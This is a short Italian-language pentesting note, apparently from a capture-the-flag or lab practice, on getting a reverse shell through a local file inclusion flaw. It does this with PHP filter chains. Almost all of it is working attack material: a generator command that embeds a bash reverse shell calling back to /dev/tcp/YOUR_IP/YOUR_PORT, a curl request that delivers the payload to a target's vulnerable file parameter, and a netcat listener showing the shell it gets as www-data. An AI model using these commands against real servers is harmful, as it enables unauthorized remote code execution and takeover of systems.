tags: LFI_Reverse_Shell LFI php_filter_chain_generator


Quando non si riesce ad avvelenare i log del server si può provare ad utilizzare questa tecnica:

Si converte una reverse shell da inserire nella LFI tramite questo programma https://github.com/tucommenceapousser/php_filter_chain_generator:

python3 php_filter_chain_generator --chain "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'\"); ?>" | grep "^php" > payload.txt

La stringa lunghissima generata da questo programma la si invia tramite curl perchè almeno esegue un payload alla volta:

curl "http://10.10.108.32/secret-script.php?file=<payload_generato>"

Mettendosi in ascolto tramite nc si ottiene una reverse shell:

nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.108.32 57838
bash: cannot set terminal process group (947): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-10-108-32:/var/www/html$